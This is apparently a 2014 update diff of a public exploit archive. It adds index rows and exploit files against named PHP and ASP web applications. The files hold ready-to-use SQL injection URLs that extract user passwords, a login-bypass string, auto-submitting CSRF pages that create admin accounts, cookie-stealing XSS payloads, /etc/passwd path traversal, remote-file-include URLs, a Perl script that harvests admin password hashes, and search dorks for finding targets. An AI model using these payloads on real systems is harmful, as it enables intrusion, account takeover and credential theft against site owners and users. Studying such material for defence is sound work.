Updated 01_17_2014

files.csv

@@ -27705,6 +27705,7 @@ id,file,description,date,author,platform,type,port
 30862,platforms/php/webapps/30862.txt,"E-Xoops 1.0.5/1.0.8 adresses/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30863,platforms/php/webapps/30863.txt,"E-Xoops 1.0.5/1.0.8 mydownloads/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30864,platforms/php/webapps/30864.txt,"E-Xoops 1.0.5/1.0.8 mysections/ratefile.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
+30872,platforms/php/webapps/30872.txt,"DomPHP <= v0.83 - SQL Injection Vulnerability",2014-01-13,Houssamix,php,webapps,0
 30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
@@ -27770,3 +27771,30 @@ id,file,description,date,author,platform,type,port
 30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
+30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
+30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x staff_del_confirm.php Multiple Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x theme_del_confirm.php name Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30950,platforms/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30951,platforms/php/webapps/30951.html,"OpenBiblio 0.x theme_preview.php themeName Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0
+30952,platforms/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Add Admin CSRF Vulnerability",2014-01-15,"HackXBack ",php,webapps,80
+30953,platforms/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30954,platforms/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30955,platforms/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,"HackXBack ",php,webapps,80
+30956,platforms/linux/dos/30956.txt,"CoolPlayer 217 'CPLI_ReadTag_OGG()' Buffer Overflow Vulnerability",2007-12-28,"Luigi Auriemma",linux,dos,0
+30957,platforms/php/webapps/30957.txt,"PHCDownload 1.1 search.php string Parameter SQL Injection",2007-12-29,Lostmon,php,webapps,0
+30958,platforms/php/webapps/30958.txt,"PHCDownload 1.1 search.php string Parameter XSS",2007-12-29,Lostmon,php,webapps,0
+30959,platforms/php/webapps/30959.txt,"Makale Scripti Cross-Site Scripting Vulnerability",2007-12-29,GeFORC3,php,webapps,0
+30960,platforms/php/webapps/30960.pl,"CustomCMS 3.1 'vars.php' SQL Injection Vulnerability",2007-12-29,Pr0metheuS,php,webapps,0
+30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 'function.php' Remote File Include Vulnerability",2007-12-30,bd0rk,php,webapps,0
+30962,platforms/php/webapps/30962.txt,"MilliScripts 'dir.php' Cross-Site Scripting Vulnerability",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0
+30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site Login SQL Injection Vulnerability",2007-12-31,"Aria-Security Team",asp,webapps,0
+30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 user/remindPassword return Parameter XSS",2007-12-31,Doz,php,webapps,0
+30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 category q Parameter XSS",2007-12-31,Doz,php,webapps,0
+30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 order return Parameter XSS",2007-12-31,Doz,php,webapps,0
+30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0
+30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
+30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
+30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
+30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0

platforms/asp/webapps/30963.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27080/info
+
+InstantSoftwares Dating Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following proof of concept is available:
+
+Username: Admin
+Password: anything' OR 'x'='x 

platforms/linux/dos/30956.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27061/info
+
+CoolPlayer is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+The issue occurs when handling specially crafted OGG files.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
+
+CoolPlayer 217 is vulnerable; other versions may also be affected.
+
+vorbiscomment -t cTag=AAA_2500_A's_AAA -a input.ogg output.ogg 

platforms/multiple/remote/30972.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27107/info
+
+Camtasia Studio is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit will allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+NOTE: This vulnerability was initially considered a cross-site scripting issue, but further analysis reveals that this is a remote code-execution vulnerability.
+
+http://www.example.com/Example_controller.swf?csPreloader=http://www.example2.com/DoKnowEvil.swf%3f 

platforms/multiple/remote/30973.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27109/info
+
+InfoSoft FusionCharts is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. 
+
+http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E 

platforms/php/webapps/30872.txt

@@ -0,0 +1,20 @@
+-------------------------------------------------------------
+DomPHP <= v0.83 SQL Injection Vulnerability 
+-------------------------------------------------------------
+ 
+= Author : Houssamix                       
+= Script : DomPHP <= v0.83
+                    
+= Download : http://www.domphp.com/download/  
+            
+= BUG :  SQL Injection Vulnerability 
+ 
+= DORK : Site créé à l'aide du CMS DomPHP v0.83 
+ 
+= Exploit :                               
+http://[target]/agenda/indexdate.php?ids=77 [SQL]
+                 
+Exemple : 				 
+
+http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--
+

platforms/php/webapps/30912.txt

@@ -6,8 +6,6 @@ Car Rental Script - Multiple Vulnerabilities
 .:. Contact        : h-b@usa.com
 .:. Home           : http://www.iphobos.com/blog/
 .:. Script         : http://www.phpjabbers.com/car-rental/
-.:. Tested On Demo :
-http://www.phpjabbers.com/demo/cr_11/index.php?controller=Admin&action=login
 ####################################################################
 
 ===[ Exploit ]===

platforms/php/webapps/30945.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27051/info
+
+FaqMasterFlexPlus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+All versions of FaqMasterFlexPlus are considered vulnerable. 
+
+http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS] 

platforms/php/webapps/30946.txt

@@ -0,0 +1,79 @@
+##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+##
+||                                                                  ||
+|| Advisory           : Collabtive Sql Injection                    ||
+|| Affected Version   : 1.1                                         || 
+|| Vendor             : http://collabtive.o-dyn.de/index.php        || 
+|| Risk               : Medium                                      ||
+|| CVE-ID             : 2013-6872                                   || 
+|| Tested on Platform : Windows 7                                   ||
+##=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+##
+
+==========================================================================================================
+
+Product Description:
+
+
+Collabtive is web-based project management software.
+The project was started in November 2007. It is open source software and provides an alternative to proprietary tools like Basecamp. Collabtive is written in PHP and JavaScript.
+
+Collabtive is intended for small to medium-sized businesses and freelancers. We offer commercial services for installation and customization of Collabtive.
+It can also be installed on an internal server as well as in the cloud. All major browsers like Internet Explorer, Firefox, Chrome and Safari are supported.
+
+Collabtive is developed by a team of professional volunteers. Everyone involved is a pro in their respective areas, providing high quality contributions to the project.
+
+(from product home page)
+
+Collabtive has more than 1000 downloads per week.
+==========================================================================================================
+
+Vulnerability Description:
+
+Double query type of SQL Injection vulnerability has been detected in Collabtive web applivation. Application failed to sanitize user supplied input in parameter "id" of page managetimetracker.php.
+
+User must be authenticated to exploit this vulnerability.
+
+This vulnerability was tested with Collabtive 1.1. Other versions may also be affected. 
+
+===========================================================================================================
+
+Impact:
+
+Successful exploitation of this vulnerability will allow a remote authenticated attacker to extract sensitive and confidential data from the database.
+
+===========================================================================================================
+
+Proof of Concept:
+
+URL: http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2
+
+PAYLOAD: and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
+
+Example:
+
+Following query will show name of first database in error.
+
+http://www.example.com/collabtive/managetimetracker.php?action=projectpdf&id=2 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
+
+===========================================================================================================
+
+Solution:
+
+There's no known workaround available.
+
+This vulnerability has been fixed in version 1.2 of Collabtive.
+
+===========================================================================================================
+
+Disclosure Timeline:
+~Vendor notification: 26th November 2013
+~Vendor response: 27th November 2013
+~Vendor released updates: 4th January 2014
+~Public disclosure: 15th January 2014
+===========================================================================================================
+
+Advisory discovered by: Yogesh Phadtare	
+                        Secur-I Research Group
+                        http://securview.com/ 
+
+                        
+

platforms/php/webapps/30947.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27052/info
+
+FaqMasterFlexPlus is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+All versions of FaqMasterFlexPlus are considered vulnerable.
+
+http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*
+http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin 

platforms/php/webapps/30948.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27053/info
+
+OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect Openbiblio 0.5.2-pre4 and prior versions. 
+
+http://www.example.com/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS]

platforms/php/webapps/30949.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27053/info
+ 
+OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+ 
+These issues affect Openbiblio 0.5.2-pre4 and prior versions. 
+
+http://www.example.com/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]

platforms/php/webapps/30950.html

@@ -0,0 +1,75 @@
+Pet Listing Script V1.0 - Multiple Vulnerabilities
+====================================================================
+
+####################################################################
+.:. Author         : HackXBack
+.:. Contact        : h-b@usa.com
+.:. Home           : http://www.iphobos.com/blog/
+.:. Script         : http://www.phpjabbers.com/pet-listing-script/
+####################################################################
+
+===[ Exploit ]===
+
+[1] Cross Site Request Forgery
+==============================
+
+[Add Admin]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=AdminUsers&action=create">
+<input type="hidden" name="user_create" value="1"/>
+<input type="hidden" name="role_id" value="1"/>
+<input type="hidden" name="username" value="Admin"/>
+<input type="hidden" name="password" value="Password"/>
+<input type="hidden" name="status" value="T"/>
+</form>
+</body>
+</html>
+
+[2] Multiple Cross Site Scripting
+==================================
+
+# CSRF with XSS Exploit:
+
+I. Xss In Type
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=AdminTypes&action=create">
+<input type="hidden" name="type_create" value="1"/>
+<input type="hidden" name="type_title"
+value="<script>alert(document.cookie);</script>"/>
+</form>
+</body>
+</html>
+
+II. Xss In Breed
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=AdminBreeds&action=create">
+<input type="hidden" name="breed_create" value="1"/>
+<input type="hidden" name="breed_title"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="type_id" value="2"/>
+</form>
+</body>
+</html>
+
+III. Xss In Extra
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=AdminExtras&action=create">
+<input type="hidden" name="extra_create" value="1"/>
+<input type="hidden" name="extra_title"
+value="<script>alert(document.cookie);</script>"/>
+</form>
+</body>
+</html>
+####################################################################

platforms/php/webapps/30951.html

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27053/info
+  
+OpenBiblio is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection, cross-site scripting, HTML-injection, and local file-include vulnerabilities.
+  
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, execute arbitrary local scripts, retrieve potentially sensitive information, or exploit latent vulnerabilities in the underlying database.
+  
+These issues affect Openbiblio 0.5.2-pre4 and prior versions. 
+
+<form action="http://www.example.com/openbiblio/admin/theme_preview.php" method="post">
+<input type="text" name="themeName" size="40" value="<script>alert(
+document.cookie);</script>"><br><br>
+<input type="submit" value="doit">
+</form>

platforms/php/webapps/30952.html

@@ -0,0 +1,34 @@
+Property Listing Script V2.0 - Add Admin CSRF Vulnerability
+====================================================================
+
+####################################################################
+.:. Author         : HackXBack
+.:. Contact        : h-b@usa.com
+.:. Home           : http://www.iphobos.com/blog/
+.:. Script         : http://www.phpjabbers.com/property-listing-script/
+####################################################################
+
+===[ Exploit ]===
+
+Cross Site Request Forgery
+==========================
+
+[Add Admin]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=AdminUsers&action=create"
+enctype="multipart/form-data">
+<input type="hidden" name="user_create" value="1" />
+<input type="hidden" name="full_name" value="Iphobos" />
+<input type="hidden" name="username" value="Admin" />
+<input type="hidden" name="password" value="Password" />
+<input type="hidden" name="status" value="T" />
+<input type="hidden" name="role_id" value="1" />
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>
+
+####################################################################

platforms/php/webapps/30953.txt

@@ -0,0 +1,93 @@
+Vacation Packages Listing V2.0 - Multiple Vulnerabilities
+====================================================================
+
+####################################################################
+.:. Author         : HackXBack
+.:. Contact        : h-b@usa.com
+.:. Home           : http://www.iphobos.com/blog/
+.:. Script         : http://www.phpjabbers.com/vacation-packages/
+####################################################################
+
+===[ Exploit ]===
+
+[1] Cross Site Request Forgery
+==============================
+
+[Add Admin]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
+<input type="hidden" name="user_create" value="1"/>
+<input type="hidden" name="role_id" value="1"/>
+<input type="hidden" name="email" value="Email@hotmail.com"/>
+<input type="hidden" name="password" value="123456"/>
+<input type="hidden" name="name" value="Iphobos"/>
+<input type="hidden" name="phone" value="123456789"/>
+<input type="hidden" name="status" value="T"/>
+<input type="hidden" name="contact_title" value=""/>
+<input type="hidden" name="contact_phone" value=""/>
+<input type="hidden" name="contact_mobile" value=""/>
+<input type="hidden" name="contact_fax" value=""/>
+<input type="hidden" name="contact_url" value=""/>
+</form>
+</body>
+</html>
+
+[2] Multiple Cross Site Scripting
+==================================
+
+# CSRF with XSS Exploit:
+
+I. Xss In Types
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminTypes&action=pjActionCreate">
+<input type="hidden" name="type_create" value="1"/>
+<input type="hidden" name="i18n[1][name]"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="i18n[3][name]" value=""/>
+<input type="hidden" name="i18n[2][name]" value=""/>
+</form>
+</body>
+</html>
+
+II. Xss In Features
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminFeatures&action=pjActionCreate">
+<input type="hidden" name="feature_create" value="1"/>
+<input type="hidden" name="i18n[1][name]"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="i18n[3][name]" value=""/>
+<input type="hidden" name="i18n[2][name]" value=""/>
+</form>
+</body>
+</html>
+
+III. Xss In Countries
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminCountries&action=pjActionCreate">
+<input type="hidden" name="country_create" value="1"/>
+<input type="hidden" name="i18n[1][name]"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="i18n[3][name]" value=""/>
+<input type="hidden" name="i18n[2][name]" value=""/>
+</form>
+</body>
+</html>
+
+[3] Local File disclure
+========================
+
+http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd
+
+####################################################################

platforms/php/webapps/30954.txt

@@ -0,0 +1,63 @@
+Hotel Booking System V3.0 - Multiple Vulnerabilties
+====================================================================
+
+####################################################################
+.:. Author         : HackXBack
+.:. Contact        : h-b@usa.com
+.:. Home           : http://www.iphobos.com/blog/
+.:. Script         : http://www.phpjabbers.com/hotels-booking-system/
+####################################################################
+
+===[ Exploit ]===
+
+[1] Cross Site Request Forgery
+==============================
+
+[Add Admin]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
+<input type="hidden" name="user_create" value="1"/>
+<input type="hidden" name="role_id" value="1"/>
+<input type="hidden" name="email" value="Email@hotmail.com"/>
+<input type="hidden" name="password" value="123456"/>
+<input type="hidden" name="name" value="Iphobos"/>
+<input type="hidden" name="status" value="T"/>
+</form>
+</body>
+</html
+
+[2] Cross Site Scripting
+========================
+
+# CSRF with XSS Exploit:
+
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0"
+action="site/index.php?controller=pjAdminRooms&action=pjActionCreate">
+<input type="hidden" name="room_create" value="1"/>
+<input type="hidden" name="i18n[1][name]"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="i18n[3][name]" value=""/>
+<input type="hidden" name="i18n[2][name]" value=""/>
+<input type="hidden" name="i18n[1][description]" value="Iphobos"/>
+<input type="hidden" name="i18n[3][description]" value=""/>
+<input type="hidden" name="i18n[2][description]" value=""/>
+<input type="hidden" name="adults" value="1"/>
+<input type="hidden" name="children" value="0"/>
+<input type="hidden" name="cnt" value="1"/>
+</form>
+</body>
+</html>
+
+
+[3] Local File disclure
+========================
+
+http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd
+
+####################################################################

platforms/php/webapps/30955.txt

@@ -0,0 +1,89 @@
+Vacation Rental Script V3.0 - Multiple Vulnerabilties
+====================================================================
+
+####################################################################
+.:. Author         : HackXBack
+.:. Contact        : h-b@usa.com
+.:. Home           : http://www.iphobos.com/blog/
+.:. Script         : http://www.phpjabbers.com/vacation-rental-script/
+####################################################################
+
+===[ Exploit ]===
+
+[1] Cross Site Request Forgery
+==============================
+
+[Add Admin]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
+<input type="hidden" name="user_create" value="1"/>
+<input type="hidden" name="role_id" value="1"/>
+<input type="hidden" name="email" value="Email@hotmil.com"/>
+<input type="hidden" name="password" value="123456"/>
+<input type="hidden" name="name" value="Iphobos"/>
+<input type="hidden" name="phone" value="123456789"/>
+<input type="hidden" name="status" value="T"/>
+</form>
+</body>
+</html>
+
+[2] Multiple Cross Site Scripting
+==================================
+
+# CSRF with XSS Exploit:
+
+I. Xss In Types
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminTypes&action=pjActionCreate">
+<input type="hidden" name="type_create" value="1"/>
+<input type="hidden" name="i18n[1][name]"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="i18n[3][name]" value=""/>
+<input type="hidden" name="i18n[2][name]" value=""/>
+</form>
+</body>
+</html>
+
+II. Xss In Features
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminFeatures&action=pjActionCreate">
+<input type="hidden" name="feature_create" value="1"/>
+<input type="hidden" name="i18n[1][name]"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="i18n[3][name]" value=""/>
+<input type="hidden" name="i18n[2][name]" value=""/>
+</form>
+</body>
+</html>
+
+III. Xss In Countries
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://site/index.php?controller=pjAdminCountries&action=pjActionCreate">
+<input type="hidden" name="country_create" value="1"/>
+<input type="hidden" name="i18n[1][name]"
+value="<script>alert(document.cookie);</script>"/>
+<input type="hidden" name="i18n[3][name]" value=""/>
+<input type="hidden" name="i18n[2][name]" value=""/>
+</form>
+</body>
+</html>
+
+
+[3] Local File disclure
+========================
+
+http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd
+
+####################################################################

platforms/php/webapps/30957.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27066/info
+
+PHCDownload is prone to an SQL-injection and cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHCDownload 1.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[phcdownload/search.php?string=' 

platforms/php/webapps/30958.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27066/info
+ 
+PHCDownload is prone to an SQL-injection and cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Attackers may also exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+PHCDownload 1.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[phcdownload/search.php?string=[XSS]

platforms/php/webapps/30959.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27067/info
+
+Makale Scripti is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://site.com/script_path/Ara/?ara= "><script>alert("g3");</script> 

platforms/php/webapps/30960.pl

@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/27069/info
+
+CustomCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CustomCMS 3.1 is vulnerable to this issue; other versions may also be affected. 
+
+#!/usr/bin/perl
+#Found by Pr0metheuS
+#Coded by Pr0metheuS
+#Gr33tz-Team
+#Dork : intitle:"CCMS v3.1 Demo PW"
+print "______________________________________\n";
+print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n";
+print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n";
+print "______________________________________\n";
+print "[+] Enter SITE:\n";
+$SITE = <STDIN>;
+chomp $SITE;
+print "[+] Enter PATH:\n";
+$PATH = <STDIN>;
+chomp $PATH;
+print "[+] Enter USERID:\n";
+$USERID = <STDIN>;
+chomp $USERID;
+print "______________________________________\n";
+#Send Request
+use LWP::UserAgent;
+$ua = new LWP::UserAgent;
+$ua->agent("Mozilla/8.0");
+$ua = LWP::UserAgent->new;
+my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*");
+$req->header('Accept' => 'text/html');
+$res = $ua->request($req);
+$con = $res->content;
+#FIND MD5 IN TEXT REGEX !!!
+if ($con =~ "/([0-9a-fA-F]{32})/") {
+print "______________________________________\n";
+print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n";
+print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n";
+print "[+] Exploit successful!\n";
+print "[+] USERID:$USERID\n";
+print "[+] MD5:$1\n";
+print "______________________________________\n";
+}
+else{
+print "______________________________________\n";
+print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n";
+print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n";
+print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n";
+  print "[+] Exploit Failed!\n";
+}

platforms/php/webapps/30961.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27075/info
+
+Kontakt Formular is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+This issue affects Kontakt Formular 1.4; other versions may be vulnerable as well.
+
+http://www.example.com/[path]/includes/function.php?root_path=[Shellcode] 

platforms/php/webapps/30962.txt

